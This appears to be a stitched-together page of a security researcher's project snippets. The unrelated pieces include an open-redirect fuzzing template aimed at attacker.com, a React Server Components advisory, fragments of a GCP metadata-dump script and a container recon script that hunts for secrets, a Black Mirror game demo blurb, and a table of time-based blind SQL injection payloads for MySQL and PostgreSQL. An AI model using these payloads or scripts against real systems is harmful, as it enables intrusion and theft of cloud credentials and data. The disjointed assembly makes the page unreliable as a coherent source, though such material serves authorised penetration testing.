Many applications use inconsistent or custom parameter names to handle post-logout redirection, and this is where open redirect, forced navigation, and privilege-related issues often hide.
Whenever you encounter a /logout, /signout, /endSession, or similar endpoint — fuzz it with this list.
Burp Intruder / Turbo Intruder
/logout?§PARAM§=https://attacker.com
Google Colab (short for Colaboratory) is a powerful, browser-based platform that allows you to write and execute Python code with zero configuration.
At its core, Colab operates through Notebooks, where you can run code cells independently. Gain free access to powerful GPUs (like the T4) and TPUs, making it ideal for training heavy deep learning models. Read more at https://research.google.com/colaboratory/faq.html
ReconX is an end-to-end automated external security assessment framework designed for professional penetration testers, bug bounty hunters, and enterprise red teams.
It performs deep recon, enumeration, vulnerability scanning, OSINT, exposure discovery, and reporting across multiple targets at scale.
An information leak vulnerability exists in specific configurations of React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. A specifically crafted HTTP request sent to a vulnerable Server Function may unsafely return the source code of any Server Function. Exploitation requires the existence of a Server Function which explicitly or implicitly exposes a stringified argument.
| #!/usr/bin/env python3 | |
| import urllib.request | |
| import urllib.error | |
| import socket | |
| BASE_URL = "http://metadata.google.internal/computeMetadata/v1" | |
| HEADER = {"Metadata-Flavor": "Google"} | |
| OUTPUT = "gcp_metadata_dump.txt" | |
| # ---- HTTP Helper ----------------------------------------------------------- |
| #!/usr/bin/env bash | |
| # cos_audit.sh | |
| # Container-Optimized OS (COS) guest audit script (read-only) | |
| # Produces a PASS / FAIL / INFO style report for many guest-side hardening checks. | |
| # | |
| # Usage: | |
| # sudo ./cos_audit.sh | tee cos_audit_$(date +%F_%T).log | |
| # | |
| # Author: Generated by ChatGPT for Bipin Jitiya (auditor) | |
| set -u |
| #!/usr/bin/env bash | |
| # container_recon.sh | |
| # A safe, non-destructive container reconnaissance script for advanced users. | |
| # Purpose: gather capability, namespace, cgroup, mount, device, network and quick secrets hints. | |
| # Usage: ./container_recon.sh [-o /path/to/output] [-d] [-v] | |
| # -o OUTPUT : write report to OUTPUT (default: /tmp/container_recon_<ts>.txt) | |
| # -d : deep scan mode (may take longer and search deeper for writable dirs and secrets) | |
| # -v : verbose (prints progress markers to stderr) | |
| # -h : help |
What if fiction became reality?
In Black Mirror, Colin Ritman's mysterious creation, Thronglets, was more than a game, it was a digital life simulation that blurred the line between code and consciousness.
This project is a browser-based recreation of that unsettling vision. On screen, you'll see chaotic little beings moving, interacting, and evolving, as if they had minds of their own. It is not just a retro-inspired simulation; it's a glimpse into the strange possibility of artificial life trapped inside code.
🎮 Play the demo here 👉 https://win3zz.com/throng
| Title | Payload | |
|---|---|---|
| MySQL >= 5.0.12 OR time-based blind (query SLEEP) | OR (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test) | |
| MySQL >= 5.0.12 OR time-based blind (SLEEP) | OR SLEEP([SLEEPTIME]) | |
| MySQL < 5.0.12 OR time-based blind (BENCHMARK) | OR 1337=BENCHMARK([SLEEPTIME]000000,MD5('win3zz_test')) | |
| MySQL > 5.0.12 OR time-based blind (heavy query) | OR 1337=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) | |
| MySQL >= 5.0.12 RLIKE time-based blind | RLIKE SLEEP([SLEEPTIME]) | |
| MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) | RLIKE (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test) | |
| MySQL OR time-based blind (ELT) | OR ELT(1337=1337,SLEEP([SLEEPTIME])) | |
| PostgreSQL > 8.1 OR time-based blind | OR 1337=(SELECT 1337 FROM PG_SLEEP([SLEEPTIME])) | |
| PostgreSQL OR time-based blind (heavy query) | OR 1337=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) |